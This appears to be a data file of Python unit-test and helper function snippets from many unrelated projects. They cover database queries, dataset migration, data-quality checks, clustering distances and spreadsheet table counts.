test_database(self):\n review = Review(project=self.new_project, user=self.new_user, design=7, usability=6, content=5, comment=\"This is a nice website.\")\n review.save()\n reviews = Review.objects.all()\n\n self.assertTrue(len(reviews) > 0)", "def test_create_subject_access_review_for_all_namespaces(self):\n pass", "def _google_data_test(self):\r\n res = Bmark.query.all()\r\n self.assertEqual(\r\n len(res),\r\n 9,\r\n \"We should have 9 results, we got: \" + str(len(res)))\r\n\r\n # verify we can find a bookmark by url and check tags, etc\r\n check_url = 'http://www.alistapart.com/'\r\n check_url_hashed = generate_hash(check_url)\r\n found = Bmark.query.filter(Bmark.hash_id == check_url_hashed).one()\r\n\r\n self.assertTrue(\r\n found.hashed.url == check_url, \"The url should match our search\")\r\n self.assertEqual(\r\n len(found.tags),\r\n 4,\r\n \"We should have gotten 4 tags, got: \" + str(len(found.tags)))\r\n\r\n # and check we have a right tag or two\r\n self.assertTrue(\r\n 'html' in found.tag_string(),\r\n 'html should be a valid tag in the bookmark')\r\n\r\n # and check the long description field\r\n self.assertTrue(\r\n \"make websites\" in found.extended,\r\n \"'make websites' should be in the extended description\")", "def test_find_2018_cais_name_table30():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 30\n\n found_in_table_30, expected_in_table_30 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_30 == expected_in_table_30", "def test_create_resource_access_review_for_all_namespaces(self):\n pass", "def test_text_classifier_test(self):\n pass", "def test_find_2018_cais_name_table28():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 28\n\n found_in_table_28, expected_in_table_28 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_28 == expected_in_table_28", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"description\",\n place_of_perform_country_c=\"UK\",\n record_type=2)\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"description\",\n place_of_perform_country_c=\"USA\",\n record_type=2\n )\n det_award_3 = 
DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=None,\n place_of_perform_country_c=\"USA\",\n record_type=2)\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"\",\n place_of_perform_country_c=\"UsA\",\n record_type=2)\n det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"\",\n place_of_perform_country_c=\"UK\",\n record_type=1)\n det_award_6 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=None,\n place_of_perform_country_c=\"UK\",\n record_type=1)\n\n errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4,\n det_award_5, det_award_6])\n assert errors == 0", "def setUp(self):\n # Create domain tables required for the test\n super().setUp()\n\n # Load the test data\n condition_occurrence_data_template = self.jinja_env.from_string(\"\"\"\n CREATE OR REPLACE TABLE `{{project_id}}.{{dataset_id}}.condition_occurrence`\n (\n condition_occurrence_id int64, \n person_id int64, \n condition_concept_id int64, \n stop_reason STRING,\n condition_source_value STRING,\n condition_status_source_value STRING)\n AS (\n WITH w AS (\n SELECT ARRAY<STRUCT<\n condition_occurrence_id int64, \n person_id int64, \n condition_concept_id int64, \n stop_reason STRING,\n condition_source_value STRING,\n condition_status_source_value STRING\n >>\n [(1, 1, 0, 'stop reason', 'source value', 'status'),\n (2, 1, 0, 'stop reason', 'source value', 'status'),\n (3, 1, 0, 'stop reason', 'source value', 'status'),\n (4, 1, 0, 'stop reason', 'source value', 'status')] col\n )\n SELECT \n condition_occurrence_id, \n person_id, \n condition_concept_id, \n stop_reason,\n condition_source_value,\n condition_status_source_value \n FROM w, UNNEST(w.col))\n \"\"\")\n\n # Load the test data\n observation_data_template = self.jinja_env.from_string(\"\"\"\n CREATE OR REPLACE TABLE `{{project_id}}.{{dataset_id}}.observation`\n (\n observation_id int64,\n person_id int64,\n observation_concept_id int64,\n observation_source_concept_id int64,\n value_as_string STRING,\n observation_source_value STRING,\n unit_source_value STRING,\n qualifier_source_value STRING,\n value_source_value STRING\n )\n AS (\n -- 1585250 corresponds to the zipcode concept that is not subject to string suppression, value_as_string for this record should be kept --\n WITH w AS (\n SELECT ARRAY<STRUCT<\n observation_id int64, \n person_id int64, \n observation_concept_id int64,\n observation_source_concept_id int64,\n value_as_string STRING, \n observation_source_value STRING,\n unit_source_value STRING,\n qualifier_source_value STRING,\n value_source_value STRING\n >>\n [(1, 1, 0, 1585250, '111111', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (2, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (3, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (4, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (5, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (6, 1, 0, 715711, 'foo_date', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value')] col\n )\n SELECT \n observation_id,\n person_id,\n observation_concept_id,\n 
observation_source_concept_id,\n value_as_string, \n observation_source_value,\n unit_source_value,\n qualifier_source_value,\n value_source_value \n FROM w, UNNEST(w.col))\n \"\"\")\n\n insert_condition_query = condition_occurrence_data_template.render(\n project_id=self.project_id, dataset_id=self.dataset_id)\n\n insert_observation_query = observation_data_template.render(\n project_id=self.project_id, dataset_id=self.dataset_id)\n\n # Load test data\n self.load_test_data([\n f'''{insert_condition_query};\n {insert_observation_query};'''\n ])", "def test_find_2018_cais_name_table29():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 29\n\n found_in_table_29, expected_in_table_29 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_29 == expected_in_table_29", "def test12(self):\n ###get a dataset to migrate from global dbs\n dest_datasets = set((dataset['dataset'] for dataset in self.api.listDatasets()))\n ###only dataset after last DBS2->3 because of the parentage issue in DBS 2 min_cdate=1368162000 =10May2013\n src_datasets = set((dataset['dataset'] for dataset in self.cmsweb_api.listDatasets(min_cdate=1368162000)))\n dataset_to_migrate = choice(list(src_datasets.difference(dest_datasets)))\n\n ###submit migration request\n toMigrate = {'migration_url': self.source_url,\n 'migration_input': dataset_to_migrate}\n migration_request = self.migration_api.submitMigration(toMigrate)\n self.assertTrue('migration_request_id' in migration_request['migration_details'])\n migration_request_id = migration_request['migration_details']['migration_request_id']\n print(\"____toMigrate___\")\n print(toMigrate)\n print(\"----------migration_request -----------\")\n print(migration_request)\n ###check migration status for max. 
300s (should be enough time to migrate the dataset)\n with Timeout(300):\n while True:\n request_status = self.migration_api.statusMigration(migration_rqst_id=migration_request_id)\n if request_status[0]['migration_status'] == 2:\n break\n\n ###validate dataset migration\n def check(input, output):\n non_comparable_keys = ('block_id', 'dataset_id', 'last_modification_date',\n 'parent_file_id', 'primary_ds_id')\n if isinstance(input, dict):\n for key, value in input.items():\n if key in non_comparable_keys:\n continue ###do not compare id's\n if key in ('processing_era',): ###do compare create_by, creation_date for re-used entries\n for key2remove in ('create_by', 'creation_date',):\n try:\n del input[key][key2remove]\n del output[key][key2remove]\n except KeyError:\n pass\n self.assertTrue(key in output)\n check(value, output[key])\n elif isinstance(input, list):\n for element_in, element_out in zip(sorted(remove_non_comparable_keys(input, non_comparable_keys)),\n sorted(remove_non_comparable_keys(output, non_comparable_keys))):\n check(element_in, element_out)\n else:\n self.assertEqual(str(input), str(output))\n\n for block_name in (block['block_name'] for block in self.cmsweb_api.listBlocks(dataset=dataset_to_migrate)):\n block_dump_src = self.cmsweb_api.blockDump(block_name=block_name)\n block_dump_dest = self.api.blockDump(block_name=block_name)\n check(block_dump_src, block_dump_dest)\n\n ###try to delete successfully executed migration request\n toDelete = {'migration_rqst_id': migration_request_id}\n self.assertRaises(HTTPError, self.migration_api.removeMigration, toDelete)", "def test_find_2018_cais_name_table18():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 18\n\n found_in_table_18, expected_in_table_18 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_18 == expected_in_table_18", "def complete_databank(port=\"localhost:27017\",coconut_database=\"COCONUT2020-10\",sweetcoconut_database=\"sweetcoconut\"):\n client = MongoClient(port)\n db_complete = client[coconut_database]\n collection = db_complete.uniqueNaturalProduct\n db_complete_only_ring_sugars = pd.DataFrame(list(collection.find({\"contains_ring_sugars\": True})))\n df_complete_tax = pd.DataFrame({\"taxonomy\": db_complete_only_ring_sugars[\"textTaxa\"],\n \"smiles\": db_complete_only_ring_sugars[\"smiles\"],\n \"coconut_id\": db_complete_only_ring_sugars[\"coconut_id\"],\n \"no_sugar_smiles\": db_complete_only_ring_sugars[\"sugar_free_smiles\"]\n })\n complete_names = []\n indexes = []\n for i in range(len(df_complete_tax.taxonomy)):\n # some entries are empty lists\n # doubles\n if df_complete_tax.taxonomy[i] != [] and (\"plants\" in df_complete_tax.taxonomy[i] or \"bacteria\" in df_complete_tax.taxonomy[i] or \"marine\" in df_complete_tax.taxonomy[i] or \"animals\" in df_complete_tax.taxonomy[i] or \"fungi\" in df_complete_tax.taxonomy[i]):\n indexes.append(i)\n complete_names.append(df_complete_tax.taxonomy[i])\n df_five_tax = df_complete_tax.loc[indexes[:]]\n df_tax_id = pd.DataFrame({\"taxonomy\": df_five_tax.taxonomy,\n \"coconut_id\": df_five_tax.coconut_id})\n df_tax_id = df_tax_id.reset_index()\n taxonomies = [\"plants\",\"bacteria\",\"fungi\",\"marine\",\"animals\"]\n biology_names = []\n for row in df_tax_id.taxonomy:\n for name in row:\n if name not in taxonomies:\n biology_names.append(name)\n for biology_name in biology_names:\n for row in df_tax_id.taxonomy:\n if biology_name in row:\n 
row.remove(biology_name)\n # **------------for tax prediction---------------**\n df_tax_id.to_pickle(\"output_data/for_predict_doubletriple.pkl\")\n # **----------end tax prediction--------------**\n for ind, tax_list in enumerate(df_tax_id.taxonomy):\n if \"marine\" in tax_list:\n #print(ind, tax_list)\n if len(tax_list) > 1:\n df_tax_id.taxonomy[ind].remove(\"marine\")\n else:\n df_tax_id.taxonomy[ind].append(\"no\")\n df_tax_id.taxonomy[ind].remove(\"marine\")\n #df_tax_id.taxonomy[ind] = [\"no\"]\n taxonomy_Double = []\n taxonomy_Triple = []\n taxonomy_single_entry = []\n for ind, tax_list in enumerate(df_tax_id.taxonomy):\n #print(ind, tax_list)\n if len(tax_list) == 1:\n taxonomy_single_entry.append(tax_list[0])\n elif len(tax_list) == 2: \n taxonomy_single_entry.append('double')\n # save original annotation\n taxonomyDouble1 = []\n for tax in tax_list:\n taxonomyDouble1.append(tax)\n taxonomy_Double.append(taxonomyDouble1)\n elif len(tax_list) == 3:\n taxonomy_single_entry.append('triple')\n # save original annotation\n taxonomyTriple1 = []\n for tax in tax_list:\n taxonomyTriple1.append(tax)\n taxonomy_Triple.append(taxonomyTriple1)\n else:\n print('Error: Too many taxonomies for one aglycon','\\n','create a new elif statement in line 102 in tanimoto_index.py')\n df_tax_id_fromCompleteDatabank = pd.DataFrame({\"taxonomy\": taxonomy_single_entry,\n \"coconut_id\": df_five_tax.coconut_id})\n sweetcoconut_databank(df_tax_id_fromCompleteDatabank,taxonomy_Double,sweetcoconut_database,port)", "def test():\n\n # todo: using 'analysisname' for group by, I think I can also use 'File Number'\n statListDict = None # list of dict mapping human readbale to column names\n masterDf = None\n interfaceDefaults = None\n\n # machine learning db\n if 0:\n # this is from mac laptop\n #path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/SANdatabaseForMachineLearning.xlsx'\n analysisName = 'File Number'\n #statListDict = None #sanpy.bAnalysisUtil.getStatList()\n categoricalList = ['LOCATION', 'SEX', 'File Number']#, 'File Name']\n hueTypes = ['LOCATION', 'SEX', 'File Number'] #, 'File Name'] #, 'None']\n sortOrder = ['LOCATION', 'SEX', 'File Number']\n\n # sanpy database\n if 0:\n #import sanpy\n #sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'sanpy'))\n #import bAnalysisUtil\n #statListDict = bAnalysisUtil.statList\n import statlist\n statListDict = statlist.statList\n\n # this is from mac laptop\n #path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '../examples/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior_Inferior_database_master_jan25.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master.csv'\n path = '/Users/cudmore/data/laura-ephys/Superior vs Inferior database_master_20210402.csv'\n\n #path = 'data/Superior vs Inferior database_master_20210402.csv'\n path = 'data/Superior vs Inferior database_master_20210402.csv'\n #path = '/Users/cudmore/data/laura-ephys/Superior_Inferior_database_master_jan25.csv'\n path = 'data/Superior vs Inferior database_13_Feb_master.csv'\n analysisName = 'analysisname'\n #statListDict = None #sanpy.bAnalysisUtil.getStatList()\n categoricalList = ['include', 'condition', 'region', 'Sex', 'RegSex', 'File Number', 'analysisname']#, 'File Name']\n hueTypes = ['region', 'sex', 'RegSex', 'condition', 'File Number', 'analysisname'] #, 'File Name'] #, 'None']\n sortOrder = ['region', 
'sex', 'condition']\n\n interfaceDefaults = {'Y Statistic': 'Spike Frequency (Hz)',\n 'X Statistic': 'region',\n 'Hue': 'region',\n 'Group By': 'File Number'}\n # bimpy database\n if 0:\n path = '../examples/edges_db.csv'\n analysisName = 'fileNumber'\n categoricalList = ['san', 'region', 'path', 'file', 'fileNumber', 'nCon']\n hueTypes = categoricalList\n sortOrder = ['san', 'region']\n\n # dualAnalysis database\n if 0:\n # grab our list of dict mapping human readable to .csv column names\n sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'sanpy'))\n import bAnalysisUtil\n statListDict = bAnalysisUtil.statList\n\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/dualAnalysis_final_db.csv'\n analysisName = 'fileNumber' # # rows in .xlsx database, one recording per row\n # trial is 1a/1b/1c... trial withing cellNumber\n categoricalList = ['include', 'region', 'fileNumber', 'cellNumber', 'trial', 'quality']\n hueTypes = categoricalList\n sortOrder = ['region']\n\n # sparkmaster lcr database\n if 0:\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/lcr-database.csv'\n analysisName = 'fileNumber' # # rows in .xlsx database, one recording per row\n # trial is 1a/1b/1c... trial withing cellNumber\n categoricalList = ['quality', 'region', 'fileNumber', 'dateFolder', 'tifFile']\n hueTypes = categoricalList\n sortOrder = ['region']\n\n # lcr/vm analysis using lcrPicker.py\n if 0:\n #basePath = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/'\n #path = basePath + 'dual-data/20210115/20210115__0002_lcrPicker.csv'\n #path = basePath + 'dual-data/20210115/20210115__0001_lcrPicker.csv'\n\n # output of lcrPicker.py ... mergeDatabase()\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/lcrPicker-db.csv'\n categoricalList = None\n hueTypes = None\n analysisName= 'tifFile'\n sortOrder = None\n\n # merged sanpy+lcr pre spike slope\n # generated by dualAnalysis.py xxx()\n # usnig to compare lcr slope to edddr for fig 9\n if 0:\n path = '/Users/cudmore/Sites/SanPy/examples/dual-analysis/combined-sanpy-lcr-db.csv'\n statListDict = None\n categoricalList = None\n hueTypes = None\n analysisName= 'filename'\n sortOrder = None\n\n if 1:\n path = 'data'\n ad = sanpy.analysisDir(path, autoLoad=True)\n for row in range(len(ad)):\n ad.getAnalysis(row)\n masterDf = ad.pool_build()\n categoricalList = ['file', 'File Number']\n hueTypes = ['file', 'File Number']\n analysisName = 'file'\n from sanpy.bAnalysisUtil import statList as statListDict\n sortOrder = ['file', 'File Number']\n interfaceDefaults = {'Y Statistic': 'Spike Frequency (Hz)',\n 'X Statistic': 'Spike Number',\n 'Hue': 'file',\n 'Group By': 'file'}\n\n #\n app = QtWidgets.QApplication(sys.argv)\n\n ex = bScatterPlotMainWindow(path, categoricalList, hueTypes,\n analysisName, sortOrder, statListDict=statListDict,\n masterDf = masterDf,\n interfaceDefaults = interfaceDefaults)\n ex.show()\n\n sys.exit(app.exec_())", "def test_gene_essentiality_from_data_qualitative(combined_dataframe):\n comparative_dataframe, exp = essential.prepare_qualitative_comparison(\n combined_dataframe\n )\n assert len(comparative_dataframe[comparative_dataframe[\"true_positives\"] == 1]) == 3", "def test_insert_domain_data_2(self):\n logging.info(\"test_insert_domain_data_2\")\n\n domain_data = test_data_utils.get_trixie_domain_data()\n statement1 = test_db_utils.domain_stmt(domain_data)\n # GeneID = \"TRIXIE_0001\"\n gene_domain_data = test_data_utils.get_trixie_gene_domain_data()\n statement2 = 
test_db_utils.gene_domain_stmt(gene_domain_data)\n statement3 = get_gene_update_statement(1, TRIXIE_GENEID)\n statements = [statement1, statement2, statement3]\n txns = [statements]\n find_domains.insert_domain_data(self.engine, txns)\n\n gene_domain_table_results = test_db_utils.get_data(test_db_utils.gene_domain_table_query)\n domain_table_results = test_db_utils.get_data(test_db_utils.domain_table_query)\n gene_table_results = test_db_utils.get_data(test_db_utils.gene_table_query)\n gene_table_dict = {}\n for dict in gene_table_results:\n gene_table_dict[dict[\"GeneID\"]] = dict\n\n domain_status = gene_table_dict[\"TRIXIE_0001\"][\"DomainStatus\"]\n d_rows = len(domain_table_results)\n gd_rows = len(gene_domain_table_results)\n\n with self.subTest():\n self.assertEqual(d_rows, 1)\n with self.subTest():\n self.assertEqual(gd_rows, 1)\n with self.subTest():\n self.assertEqual(domain_status, 1)", "def test_find_2018_cais_name_table23():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 23\n\n found_in_table_23, expected_in_table_23 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_23 == expected_in_table_23", "def test_find_2018_cais_name_table21():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 21\n\n found_in_table_21, expected_in_table_21 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_21 == expected_in_table_21", "def test_includes_two_new_datasets(self):\n new_datasets = factories.SourceDatasetFactory.create_batch(2, source_study_version=self.study_version_3)\n response = self.client.get(self.get_url(self.study.pk))\n context = response.context\n table = context['source_dataset_table']\n for new_dataset in new_datasets:\n self.assertIn(new_dataset, table.data)", "def test_create_occurrence(self):\n pass", "def test_find_2018_cais_name_table17():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 17\n\n found_in_table_17, expected_in_table_17 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_17 == expected_in_table_17", "def execute(self, context):\n if len(self.data_quality_checks) == 0:\n self.log.info('DataQualityOperator not implemented yet')\n return\n \n redshift_hook = PostgresHook(postgres_conn_id=self.redshift_conn_id) \n \n errors = 0\n failure_tests = []\n\n # process each sql stmt for data quality relevant to each dimension table:\n # Dimension tables : a. songplays, b. songs, c. artists, d. users, e. 
time\n \n for (curr_table, check_stmt) in zip(self.list_of_tables, self.data_quality_checks):\n curr_sql = check_stmt.get('check_sql')\n result1 = check_stmt.get('expected_result')\n \n self.log.info('Current Table Processed : ' + curr_table)\n\n try:\n records = redshift_hook.get_records(curr_sql)[0]\n except Exception as e:\n self.loginfo(f\"Error : {curr_table} : Query failed : {e}\")\n\n # record error when actual result is not the same as expected result\n if result1 != records[0]:\n errors += 1\n failure_tests.append(curr_table + ' : ' + curr_sql)\n \n # display Failure or Success Message \n if errors > 0:\n self.log.info(failure_tests)\n self.log.info('Failure Msg : Tests Failed')\n raise ValueError('Error : Failed : Data Quality check')\n else:\n self.log.info('Success : All Data Quality Tests passed')", "def test_find_2018_cais_name_table35():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 35\n\n found_in_table_35, expected_in_table_35 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_35 == expected_in_table_35", "def test_complete_data_schema(self):\n response = self.client.get(self.url)\n data = response.data\n self.assertIn('id', data)\n self.assertIn('title', data)\n self.assertIn('release_year', data)\n self.assertIn('casting', data)\n self.assertIn('directors', data)\n self.assertIn('producers', data)\n self.assertIn('roman_release_year', data)", "def testEquivalenceAfterRoundTrip(self):\n correct = 0\n for example in VALID_EXAMPLES:\n original_schema = schema.Parse(example.schema_string)\n round_trip_schema = schema.Parse(str(original_schema))\n if original_schema == round_trip_schema:\n correct += 1\n debug_msg = \"%s: ROUND TRIP SUCCESS\" % example.name\n else:\n debug_msg = \"%s: ROUND TRIP FAILURE\" % example.name\n self.fail(\n \"Round trip failure: %s, %s, %s\"\n % (example.name, original_schema, str(original_schema)))\n\n fail_msg = \"Round trip success on %d out of %d schemas\" % \\\n (correct, len(VALID_EXAMPLES))\n self.assertEqual(correct, len(VALID_EXAMPLES), fail_msg)", "def test_correct_labels(self):\n timeseries = self.build_timeseries()\n\n metric_labels_list = main.get_labels(timeseries[\"metric\"],\"labels\") \n expected_metric_labels_list = self.build_metric_labels()\n self.assertEqual(sorted(metric_labels_list), sorted(expected_metric_labels_list))\n\n resource_labels_list = main.get_labels(timeseries[\"resource\"],\"labels\")\n expected_resource_labels_list = self.build_resource_labels()\n self.assertEqual(sorted(resource_labels_list), sorted(expected_resource_labels_list))\n\n user_labels_list = main.get_labels(self.build_user_labels_request(),\"userLabels\")\n expected_user_labels_list = self.build_expected_user_labels_response()\n self.assertEqual(sorted(user_labels_list), sorted(expected_user_labels_list))\n\n system_labels_list = main.get_system_labels(self.build_user_labels_request(),\"systemLabels\")\n expected_system_labels_list = self.build_expected_system_labels_response()\n self.assertEqual(sorted(system_labels_list), sorted(expected_system_labels_list))", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n 
\"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def test_index_includes_practice(self):\n self.normal_api.create(\n 'Practice',\n name=u'Indexed Practice',\n summary=u\"R\\xf8ckin'\",\n tags=['super', u'c\\xf8\\xf8l', 'tagone'],\n subjects=['math', 'history', 'reading'],\n min_grade=0,\n max_grade=13,\n type='text',\n body=u\"R\\xf8ckin'\",\n youtube_id='https://www.youtube.com/watch?v=6sJqTDaOrTg',\n has_files=True,\n pending=False,\n listed=True,\n )\n\n result_dicts = [util.search_document_to_dict(doc)\n for doc in self.search_index.get_range()]\n result_kinds = [Model.get_kind(d['uid']) for d in result_dicts]\n self.assertIn('Practice', result_kinds)", "def test_recognize_describe(self):\n pass", "def test_figure4(self):\n\n topics = get_topics('msmarco-passage-dev-subset')\n qrels = get_qrels('msmarco-passage-dev-subset')\n\n self.assertEqual(len(topics), 6980)\n self.assertEqual(len(qrels), 6980)\n\n # Compute the average length of queries:\n avg_qlen = sum([len(topics[t]['title'].split()) for t in 
topics])/len(topics)\n\n # Compute the average number of relevance judgments per query:\n avg_qrels = sum([len(qrels[t]) for t in topics])/len(topics)\n\n self.assertAlmostEqual(avg_qlen, 5.925, delta=0.001)\n self.assertAlmostEqual(avg_qrels, 1.065, delta=0.001)", "def test_mhr_document_type(session):\n results = type_tables.MhrDocumentType.find_all()\n assert results\n assert len(results) >= 55\n for result in results:\n assert result.document_type in type_tables.MhrDocumentTypes\n assert result.document_type_desc\n\n doc_result = type_tables.MhrDocumentType.find_by_doc_type(type_tables.MhrDocumentTypes.REG_101.value)\n assert doc_result\n assert doc_result.document_type == type_tables.MhrDocumentTypes.REG_101.value\n assert doc_result.document_type_desc == 'MANUFACTURED HOME REGISTRATION'\n assert doc_result.legacy_fee_code == 'MHR400'\n doc_result = type_tables.MhrDocumentType.find_by_doc_type('XXX')\n assert not doc_result", "def test_find_2018_cais_name_table13():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 13\n\n found_in_table_13, expected_in_table_13 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_13 == expected_in_table_13", "def test(client, config, sampling=100):\n\n # Retrieving MongoDB collection\n db=client[config.db]\n col=db[config.collection]\n\n sys.stderr.write(\"Starting minimal benchmark scenarios for testing purpose\\n\")\n\n run_search(col,\"TopDestForMktOriSMonth-%d\"%sampling,\"FR\",get_top_dest_for_market_and_origin_and_smonth(\"FR\",\"PAR\",\"2015-01\",sampling))\n run_search(col,\"TopOnDForMktSMonth-%d\"%sampling,\"FR\", get_top_ond_for_market_and_smonth(\"FR\",\"2015-01\",sampling))\n run_search(col,\"TopOnDForMktDMonth-%d\"%sampling,\"FR\", get_top_ond_for_market_and_dmonth(\"FR\",\"2015-10\",sampling))\n run_search(col,\"PerDDateForMktSMonth-%d\"%sampling,\"FR\", get_per_dep_date_for_market_and_smonth(\"FR\",\"2015-01\",sampling))\n run_search(col,\"PerSDateForMktDMonth-%d\"%sampling,\"FR\", get_per_search_date_for_market_and_dmonth(\"FR\",\"2015-10\",sampling))\n run_search(col,\"PerStayForMktOnDSMonth-%d\"%sampling,\"FR\", get_per_stay_for_market_and_ond_and_smonth(\"FR\",\"PAR\",\"NYC\",\"2015-01\",sampling))\n run_search(col,\"PerDDOWForMktCtries-%d\"%sampling,\"FR\",get_per_depdow_for_market_and_ctries(\"FR\",\"FR\",\"US\",sampling))\n\n sys.stderr.write(\"Minimal benchmark scenarios finished\\n\")", "def test_find_2018_cais_name_table14():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 14\n\n found_in_table_14, expected_in_table_14 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_14 == expected_in_table_14", "def test_execute_review_2(self):\n review.execute_review(self.alchemist, self.test_dir,\n self.review_test_dir.name,\n filters=(\"phage.Cluster='A' \"\n \"AND phage.Subcluster='A2'\"))\n\n self.assertTrue(self.review_test_dir.is_dir())", "def test_missing_data_sources(self):", "def test_get_df_db(oracle_connector):\n data_sources_spec = [\n {\n 'domain': 'Oracle test',\n 'type': 'external_database',\n 'name': 'my_oracle_sql_con',\n 'query': 'SELECT * FROM City;',\n }\n ]\n\n data_source = OracleSQLDataSource(**data_sources_spec[0])\n df = oracle_connector.get_df(data_source)\n\n assert not df.empty\n assert df.shape == (50, 5)\n assert set(df.columns) == {'ID', 'NAME', 'COUNTRYCODE', 'DISTRICT', 'POPULATION'}\n\n 
